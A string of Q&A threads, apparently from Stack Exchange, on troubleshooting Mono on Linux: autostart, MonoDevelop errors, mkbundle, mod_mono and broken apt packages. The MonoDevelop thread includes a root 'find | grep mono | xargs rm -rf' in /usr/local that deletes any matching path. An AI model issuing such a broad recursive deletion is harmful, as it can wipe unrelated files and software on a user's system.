Edit: Note that for me, the app did not have the working directory assigned by Path, probably an error on my side somewhere, but I'll mention it, just in case.
Now I would have liked some things to be done in the original .sh file that refuses to work here. So I won't "accept" my own answer for a while, in case somebody comes along who can tell precisely what's going on.
Edit - some refs:
https://wiki.archlinux.org/index.php/Desktop_entries#File_example
https://specifications.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html#recognized-keys
|
I have a BeagleBone Black here,
running Debian 8.3, Linux 4.1.15-ti-rt-r43.
Desktop is LXQT.
After boot, I want to run a .sh file - when the desktop environment is ready, as that file, after changing path and setting some variables, calls mono to start a GUI based program.
Using the "start menu":
Preferences -> LXQt settings -> Sessions settings
-> Autostart
I added an entry, first under "Global Autostart", later under "LXQt Autostart" (only one of both boxes checked at a time). I specified, under "command", the path to my .sh script, via the "Search..." button, i.e. no mistyping possible.
I tried it with both, "Wait for system tray" checked, and unchecked.
Hit "close", and rebooted the machine via start menu each try.
After the desktop starts, nothing else happens.
The script does run fine from ssh remote* command prompt, though - the app starts.
Also, copying it to the Desktop and clicking it - works.
_* the .sh file contains the line "export DISPLAY=:0" as it was first used to start via ssh to start a GUI app.
I commented it out to see if that changes anything here, it doesn't.
EDIT:
So I have now manually crafted a .desktop file in ~/.config/autostart - noting the .desktop files LXQt made in that folder by me clicking around in the UI as described above. In my file, I specified the paths etc to start my .sh script, and set one extra option to true: "Terminal", which specifies the autostart program should be run in a terminal.
What this did was to show me - yes indeed, something gets started after boot / loading desktop env, because the terminal is visible, i.e. my autostart file is not ignored.
But the "echo" commands in my .sh script do not show up on that terminal, nor is my mono application started.
If I then open another remote shell, and copy+paste the path I gave in the autostart .desktop file under "Exec", it does start my app as supposed - so the path is correct.
So, what's happening there? The LXQt desktop obviously finds my file, tries to autostart, but it doesn't do anything.
Possible causes?
I thought (not really knowing how this all works under the hood), perhaps mono/GUI isn't ready yet, even though the desktop loaded, for some funny reason, and I put a echo "sleeping...", sleep 30s, echo "calling mono app..." before calling the mono app in my .sh file that's supposed to autostart.
None of this is visible inthe temrinal that does now open upon start, and it doesn't help.
| Why does LXQT Autostart not do anything? |
From the page at http://www.go-mono.com/mono-downloads/download.html, it seems like they used to have downloads for other distros for 2.10.x, under "Other", however it is stated that they are supported by their own communities. My guess would be that the third parties packaging Mono 2.10.x for Ubuntu and Debian have not submitted the packages to Mono.
Also, Mono was formerly developed by Novell which bought the SUSE brands and trademarks, which is what OpenSUSE is based on, and is possibly why Mono supports SUSE in particular.
|
The Mono download page has a download for OpenSuse but not any other version of Linux. Why is that, is OpenSuse better suited for Mono for some reason than say Ubuntu?
We're developing on Macs using 3.2.5 and currently deploying to an Ubuntu (12.04) server using Mono 2.10. And notice some differences, especially artifacts in ServiceStack's razor engine but otherwise mostly ok. I tried installing 3.2.4 the long way around however the site just cashes on Ubuntu so had to roll that back to 2.10.
I now need to rebuild the server anyway and would like to know if OpenSuse is the better image for us to use this time...?
| Why is Mono 3.x available specifically for OpenSuse and not other Linux (like Ubuntu) |
It looks like you've built and installed monodevelop from source - did you do the same for the dependencies like gtksharp? Since banshee and tomboy are broken, it sounds like you have a dependency shared between the broken programs, and that's an obvious candidate. Do CLI mono apps work?
From the MonoDevelop build documentation:We strongly recommend you install everything from packages if possible. If not you, you should use a Parallel Mono Environment. Do not install anything to /usr or /usr/local unless you completely understand the implications of doing do.If the other mono applications will only run from the installed monodevelop tree, and reinstalling packages hasn't helped, you might have a mess of extra stuff floating around that the source install has added which is interfering with mono finding its libraries, possibly with hardcoded paths into the monodevelop install.
My Debian-fu is not strong, but there should be a way of identifying files in /usr that dpkg doesn't know about, that might be a place to start.
|
If I want to run the application monodevelop, I need to chdir to /usr/lib/monodevelop/Bin and then execute ./MonoDevelop.exe. This is the same for all other Mono applications such as banshee, tomboy, etc.
If I attempt to run the Mono applications from another location by simply running monodevelop, or even from their own directory, I get TypeInitializationExceptions like this:behrooz@behrooz:/usr/lib/monodevelop/bin$ monodevelop
FATAL ERROR [2012-05-04 11:24:39Z]: MonoDevelop failed to start. Some
of the assemblies required to run MonoDevelop (for example gtk-sharp,
gnome-sharp or gtkhtml-sharp) may not be properly installed in the
GAC. System.TypeInitializationException: An exception was thrown by
the type initializer for Gtk.Application --->
System.EntryPointNotFoundException: glibsharp_g_thread_supported at
(wrapper managed-to-native) GLib.Thread:glibsharp_g_thread_supported
() at GLib.Thread.get_Supported () [0x00000] in :0
at Gtk.Application..cctor () [0x00000] in :0 ---
End of inner exception stack trace --- at
MonoDevelop.Ide.IdeStartup.Run (MonoDevelop.Ide.MonoDevelopOptions
options) [0x0007e] in
/home/behrooz/Desktop/Monodevelop/monodevelop-2.8.6.5/src/core/MonoDevelop.Ide/MonoDevelop.Ide/IdeStartup.cs:95
at MonoDevelop.Ide.IdeStartup.Main (System.String[] args) [0x0004f] in
/home/behrooz/Desktop/Monodevelop/monodevelop-2.8.6.5/src/core/MonoDevelop.Ide/MonoDevelop.Ide/IdeStartup.cs:503Why is that?
I have tried reinstalling all Mono, Wine, GTK, Glib, X, Gnome packages.
apt-get --purge --reinstall install $(dpkg --get-selections | grep mono | grep install | grep -v deinstall | awk'{print $1}') I also tried strace on "open" and got nothing by myself.
System Configuration:Debian 6.0-updates 64 bit
Kernel 3.2.0-2, 3.2.0-1, 3.1 and 3 EDIT: not a kernel thing
Gnome 3.4 EDIT:but a gnome thing
Mono 2.10.5
TLS: __thread
SIGSEGV: altstack
Notifications: epoll
Architecture: amd64
Disabled: none
Misc: softdebug
LLVM: supported, not enabled.
GC: Included Boehm (with typed GC and Parallel Mark) update: with upgrading to the new MonoDevelop 3.0.2 and latest Mono, I can run MonoDevelop with command monodevelop in terminal, no chdir. but gnome-shell cannot run it.
Finally found it:
as root:
cd /usr/local/
find | grep mono|xargs rm -rf
# Use with caution/some applications may get messed up (stellarium has MONOchrome images...) | Why do Mono applications only start from their own directory? |
I was very impatient and felt that the package mono-2.0-devel might have mkbundle. So I went ahead and installed mono-2.0-devel which needed only 18 additional packages. When I typed mkb and hit tab, it showed me mkbundle2.
I tried:
$ mkbundle2 -o hello hello.exe --deps
OS is: Linux
Sources: 1 Auto-dependencies: True
embedding: /home/minato/Projects/Practice/mono/hello.exe
embedding: /usr/lib/mono/2.0/mscorlib.dll
Compiling:
as -o temp.o temp.s
cc -ggdb -o hello -Wall temp.c `pkg-config --cflags --libs mono` temp.o
Done$ ls
hello hello.cs hello.e hello.exe$ ./hello
Hello from Mono!This was what I needed in the first place.
Thanks to the command-not-found tool.
|
A C# file in mono can be compiled using gmcs command. This will create a hello.exe file.
$ gmcs hello.cs
$ ls
hello.cs hello.exe
$ ./hello.exe
Hello from Mono!To generate a linux executable, I tried this command, but it generates the error:
$ gmcs /t:exe hello.cs /out:helloUnhandled Exception: System.ArgumentException: Module file name 'hello' must have file extension.I want create a standalone executable so that I can execute it simply run it by saying and I get the desired output:
$ ./hello
Hello from Mono!I searched and found a solution which mentions of a tool called mkbundle:
$ mkbundle -o hello hello.exe --deps
Sources: 1 Auto-dependencies: True
embedding: /home/ed/Projects/hello_world/hello.exe
embedding: /mono/lib/mono/1.0/mscorlib.dll
Compiling:
as -o /tmp/tmp54ff73e6.o temp.s
cc -o hello -Wall temp.c `pkg-config --cflags --libs mono` /tmp/tmp54ff73e6.o
Done$ ls -l
total 3
-rwxr-xr-x 1 ed users 1503897 2005-04-29 11:07 hello
-rw-r--r-- 1 ed users 136 2005-04-29 11:06 hello.cs
-rwxr-xr-x 1 ed users 3072 2005-04-29 11:06 hello.exeThis utility does not seem to exist in my Mono install. I found that this is available in mono-devel package. To install this package meant installing around 82 other packages. My goal was to keep my mono install minimal until sometime.
Is there a way to install mkbundle standalone?
| Generating a Linux executable with Mono with mkbundle |
In mod-mono's configuration file you must set MonoServerPath to mod-mono-server4 as explained here.
|
I have an OpenSuse Linux server and want to run an ASP.net web project. I have installed the apache2 module mod-mono, but when I try to access the ASP web pages it looks as if it is attempting to use .Net 2 when the project is built under .Net 4.
How can I change it to use .Net 4?
| Enable .Net 4 Mono on OpenSuse |
Using the Java example from http://wiki.linuxhelp.net/index.php/Nano_Syntax_Highlighting, you can try to add something like the following into your ~/.nanorc:
syntax "C# source" "\.cs$"
color green "\<(bool|byte|sbyte|char|decimal|double|float|int|uint|long|ulong|new|object|short|ushort|string|base|this|void)\>"
color red "\<(as|break|case|catch|checked|continue|default|do|else|finally|fixed|for|foreach|goto|if|is|lock|return|switch|throw|try|unchecked|while)\>"
color cyan "\<(abstract|class|const|delegate|enum|event|explicit|extern|implicit|in|internal|interface|namespace|operator|out|override|params|private|protected|public|readonly|ref|sealed|sizeof|static|struct|typeof|using|virtual|volatile)\>"
color red ""[^\"]*""
color yellow "\<(true|false|null)\>"
color blue "//.*"
color blue start="/\*" end="\*/"
color brightblue start="/\*\*" end="\*/"
color brightgreen,green " +$" |
Has anyone got (or can point in the direction of) a nanorc file that contains syntax highlighting for C# and/or ASP.Net?
| Nano syntax highlighting for C# and/or ASP. Net |
Enable the mod_mono control panel.
In httpd.conf, add
<Location /mono>
SetHandler mono-ctrl
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>You will need to modify the addresses that can access it in the Allow from line.
Reload httpd and now you can go to http://some.website.domain/mono. You can, among other things, reload all or individual mono applications.
|
Is there any way to restart ONE web application in mono without having to restart Apache?
Currently I'm doing a sudo service apache2 restart everytime I deploy my .NET web application to mono, but it restarts all my other applications, requiring them ALL to get reloaded into memory at next web request.
| How to restart mono web application without restarting apache? |
There are a good number of programs that use mono in Ubuntu if you look at the whole repository. In the default install, I believe the following are the only mono apps:f-spot
gbrainy
tomboyThere may be more, I just made this list from looking at which applications would be removed if I removed libmono*. However, even just having these means that a good portion of the mono framework is installed by default which makes it very easy to deploy mono apps onto Ubuntu. A few very popular Ubuntu applications are written in mono, including gnome-do, Banshee, and docky. The trend I've seen from the sidelines is that despite its detractors, mono is gaining a lot of ground with Desktop application authors because of the speed at one can develop fairly rich GUI apps with the monodevelop IDE.
|
I think Mono, and the C# language, are a great, nay, fantastic project.
My question is: how prevalent is Mono in Ubuntu? How much of a penetration is it getting, and what applications run on it?
| Applications that run on Mono in Ubuntu |
There are a couple of approaches to try.
The first is to fix /usr/share/cli-common/policy-remove so it doesn’t fail if the policy is absent: edit its last line so that it runs rm -f instead of rm. That should allow the packages to be removed correctly.
If that fails, and since you’re trying to remove all the Mono packages, it should be safe enough to remove the failing postrm scripts:
sudo rm /var/lib/dpkg/info/lib{glade,glib,gtk}2.0-cil.postrmThe only operation the postrm scripts do is unregister the policies, which you don’t care about since you’re removing everything anyway.
You’re not the only person to have suffered from this issue: it was reported in 2012 as Debian bug 692962.
|
I was installing some packages and during the install of one, the system hung and the package was not installed. But, the package was added to the list of installed packages. So, I restart the system and I try the following:When I try to remove the package, it doesn't work because it can't find a config file.
When I try to install the package, it says the package is already installed, and therefore won't install it
When I try to update, it tries to remove the package, and encounters the error above.So, my question is asking if there's a way to manually remove a package from the list of installed packages, or is there another way to solve this problem?
When I run: sudo apt-get upgrade
Error is:
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be REMOVED:
libglade2.0-cil libglib2.0-cil libgtk2.0-cil
0 upgraded, 0 newly installed, 3 to remove and 0 not upgraded.
18 not fully installed or removed.
After this operation, 2,819 kB disk space will be freed.
Do you want to continue? [Y/n] Y
(Reading database ... 119043 files and directories currently installed.)
Removing libglade2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.8.glade-sharp.installcligac
dpkg: error processing package libglade2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Removing libgtk2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.6.gtk-dotnet.installcligac
dpkg: error processing package libgtk2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Removing libglib2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.6.glib-sharp.installcligac
dpkg: error processing package libglib2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Errors were encountered while processing:
libglade2.0-cil
libgtk2.0-cil
libglib2.0-cil
E: Sub-process /usr/bin/dpkg returned an error code (1) | Unable to remove CLI library packages |
If you were getting this error on an install operation then a likely cause would be that your local database of available packages doesn't match what's available on the server, so APT is requesting package versions that don't exist anymore. The fix in that case is to run apt-get update to update the local availability database. However I don't see how this could happen on a remove or purge operation.
It's possible that the APT database was in a transitional state with unresolved dependencies. APT can't cope with unresolved dependencies so the first thing it needs to do, even on a removal operation, is to fix those dependencies. Try running apt-get -f install to get into a consistent state without changing what APT considers to be the desired state, before you make changes to the desired state such as requesting the installation or removal of a package.
|
After I sudo apt-get install mono-devel , when I try to purge mono-devel on Ubuntu Linux 16.04, I get the following error message:
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:The following packages have unmet dependencies:
mono-devel : Depends: mono-runtime (>= 2.10.1) but it is not installable
Depends: libmono-cecil-private-cil (>= 2.6.3) but it is not going to be installed
Depends: libmono-codecontracts4.0-cil (>= 1.0) but it is not going to be installed
Depends: libmono-compilerservices-symbolwriter4.0-cil (>= 1.0) but it is not going to be installed
Depends: libmono-corlib2.0-cil (>= 2.6.3) but it is not going to be installed
Depends: libmono-corlib4.0-cil (>= 2.10.1) but it is not going to be installed
Depends: libmono-peapi2.0-cil (>= 2.4.2) but it is not going to be installedWhy does this error occur and how can I fix it?
Also, is it necessary to install mono-devel for a production system? I understand that mono-devel contains various development tools and pulls in the default development stack for Mono .
We may be using mono-devel for C#/ASP.NET webforms compilation and development.
[EDIT June 13 2016 7:46AM] This morning I ran sudo apt-get -f install followed by sudo apt-get remove mono-devel. Here is the resulting error message: vanhuys@udel-ThinkStation-S10:~$ sudo apt-get remove mono-devel
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
libapache2-mod-mono : Depends: mono-apache-server (>= 4.2) but it is not going to be installed or
mono-apache-server4 (>= 4.2) but it is not going to be installed
Depends: mono-apache-server (< 4.4) but it is not going to be installed or
mono-apache-server4 (< 4.4) but it is not going to be installed
E: Error, pkgProblemResolver::Resolve generated breaks, this may be caused by held packages.
| Why I cannot purge mono-devel on Ubuntu Linux 16.04? |
Linphone's mediastream require CTRL+C (SIGINT) to close properly and killall default signal is SIGTERM. So you can try SIGINT signal in killall command as follows:
killall -SIGINT mediastreamor
killall -2 mediastream |
I am running my donnet framework based application using mono in Linux Ubuntu. My application uses linphone's mediastream command to open the RTP socket and hook the audio device.
I am using the following mediastream command to call from my application:
mediastream (arguments......)Every thing is working fine but when i am trying to kill the mediastream using the killall command, it goes defunct. I am giving the following command from my application:
killall mediastreamWhat I am doing wrong? How can I handle those defunct processes?
| Mediastream goes defunct |
I encountered the same problem today and this worked for me (I'm running Armbian on a Pine64):
mv /etc/mono/config.dpkg-new /etc/mono/config
followed by
apt install ca-certificates-mono
I got the solution from over here:
|
I wanted to upgrade my packages on my raspberry pi, so I've successfully done a apt-get upgrade.
After that, I obviously wanted to do an apt-get upgrade but I had an error.
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run 'apt --fix-broken install' to correct these.
The following packages have unmet dependencies:
mono-devel : Depends: ca-certificates-mono (= 6.0.0.319-0xamarin1+raspbian9b1) but 5.12.0.226-0xamarin3+raspbian9b1 is installed
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).Like it's recommanded, I did an apt --fix-broken install, but I've got a bunch of errors because of that.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Correcting dependencies... Done
The following packages were automatically installed and are no longer required:
libmono-system-runtime-interopservices-runtimeinformation4.0-cil libnunit-cil-dev libnunit-console-runner2.6.3-cil libnunit-core-interfaces2.6.3-cil libnunit-core2.6.3-cil libnunit-framework2.6.3-cil libnunit-mocks2.6.3-cil
libnunit-util2.6.3-cil libpng12-0
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
ca-certificates-mono
The following packages will be upgraded:
ca-certificates-mono
1 upgraded, 0 newly installed, 0 to remove and 89 not upgraded.
171 not fully installed or removed.
Need to get 0 B/31.2 kB of archives.
After this operation, 6,144 B of additional disk space will be used.
Do you want to continue? [Y/n]
Reading changelogs... Done
Setting up mono-gac (6.0.0.319-0xamarin1+raspbian9b1) ...
* Installing 1 assembly from libnunit-console-runner2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit-console-runner-2.6.3/nunit-console-runner.dll failed
E: Installation of libnunit-console-runner2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-core2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.core-2.6.3/nunit.core.dll failed
E: Installation of libnunit-core2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-core-interfaces2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.core.interfaces-2.6.3/nunit.core.interfaces.dll failed
E: Installation of libnunit-core-interfaces2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-framework2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.framework-2.6.3/nunit.framework.dll failed
E: Installation of libnunit-framework2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-mocks2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.mocks-2.6.3/nunit.mocks.dll failed
E: Installation of libnunit-mocks2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-util2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.util-2.6.3/nunit.util.dll failed
E: Installation of libnunit-util2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit-console-runner into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
